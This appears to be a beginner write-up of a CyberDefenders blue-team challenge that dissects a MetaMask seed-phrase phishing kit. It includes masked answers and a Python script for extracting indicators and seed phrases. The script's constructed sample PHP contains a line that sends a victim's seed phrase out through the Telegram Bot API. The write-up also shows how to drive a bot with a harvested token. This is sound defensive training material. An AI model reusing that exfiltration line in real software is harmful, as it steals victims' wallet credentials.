CyberDefenders: GrabThePhisher

This Blue Team challenge was released by CyberDefenders on 7/23/2022. You can access the room at

This is one of the easiest challenges I’ve ever encountered from This is a perfect challenge for beginners who just want to get their feet wet in doing hacking/IR challenges. The skills needed to complete this challenge are reading the phishing actor's code in any text editor/viewer and a little research on how Telegram works.

I hope you will find my write-up helpful.

First, download the challenge file and unzip it:

  • Which wallet was used for asking the seed phrase?
    • m*******
  1. Browse to c75-GrabThePhisher > pankewk > metamask
  2. Open the file metamask.php with your choice of text editor/viewer
  • What is the file name that has the code for the phishing kit?
    • m*******.***
  • In which language was the kit written?
    • p**
  • What service does the kit use to retrieve the victim’s machine information?
    • s**** ***
  • How many seed phrases were already collected?
    • *
  1. Browse to c75-GrabThePhisher > pankewk > log
  2. Open log.txt
  • Write down the seed phrase of the most recent phishing incident?
    • f***** **** ******* ****** ******* ******* ******** ******* ***** **** ****** ******
  • Which medium had been used for credential dumping?
    • t*******
  1. Look inside the file metamask.php again
  • What is the token for the channel?
    • 5*********:***********************************
  • What is the chat ID of the phisher’s channel?
    • 5*********
  • What is the alias of the phish kit developer?
    • j***********
  • What is the full name of the phish actor?
    • M***** ********
  1. To find the full name of the phish actor, we have to use the information we already have on hand, such as the Telegram user ID, token, and URL found inside the file metamask.php
  2. Read about the Telegram bot API from the page,
  3. We will have to use the Bot API's sendMessage method, passing the chat ID and sending a random message through the text parameter.
  4. Enter the following into the URL bar: enter_userID_here&text=Hello_World
  • What is the username of the phish actor?
    • p**********
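
The metamask.php and log.txt steps above can also be scripted when triaging a captured kit. The following is an added example, not code from the challenge or the original write-up: it pulls Telegram exfiltration indicators (bot token, chat ID, Bot API method) out of PHP source and lists seed-phrase lines from a log. The sample PHP, token, chat ID and log lines are constructed, and the function names and the assumption that the log is appended in time order are mine.

```python
import re

# Bot tokens are "<numeric bot id>:<35 URL-safe characters>".
TOKEN_RE = re.compile(r"(?<!\d)\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
# Bot API calls look like https://api.telegram.org/bot<token>/<method>.
METHOD_RE = re.compile(r"api\.telegram\.org/bot[^/\s\"']*/(\w+)")
# chat_id assigned as a PHP variable, array key or JSON field.
CHAT_RE = re.compile(r"chat_?id[\"']?\s*(?:=>|=|:)\s*[\"']?(-?\d{5,})", re.I)
BIP39_LENGTHS = {12, 15, 18, 21, 24}  # valid mnemonic word counts

def extract_telegram_iocs(source: str) -> dict:
    """Return de-duplicated Telegram indicators found in kit source code."""
    return {
        "tokens": sorted(set(TOKEN_RE.findall(source))),
        "chat_ids": sorted(set(CHAT_RE.findall(source))),
        "methods": sorted(set(METHOD_RE.findall(source))),
    }

def find_seed_phrases(log_text: str) -> list:
    """Return log lines that look like seed phrases, in file order."""
    phrases = []
    for line in log_text.splitlines():
        words = line.split()
        if len(words) in BIP39_LENGTHS and all(w.isalpha() and w.islower() for w in words):
            phrases.append(" ".join(words))
    return phrases

# Constructed sample input (not the challenge's real file contents).
SAMPLE_PHP = r'''<?php
$token = "1234567890:AAExampleConstructedTokenValue_0000";
$chat_id = "1234567890";
$msg = urlencode($_POST["phrase"]);
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=$msg");
'''
SAMPLE_LOG = """alpha bravo charlie delta echo foxtrot golf hotel india juliet kilo lima
-- not a phrase --
mike november oscar papa quebec romeo sierra tango uniform victor whiskey xray
"""

if __name__ == "__main__":
    print(extract_telegram_iocs(SAMPLE_PHP))
    found = find_seed_phrases(SAMPLE_LOG)
    # Assumes the kit appends to the log, so the last entry is the newest.
    print(len(found), "phrases; most recent:", found[-1])
```
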

Thank you for checking my write-up. Please subscribe if you haven’t.

Published by lightkunyagami
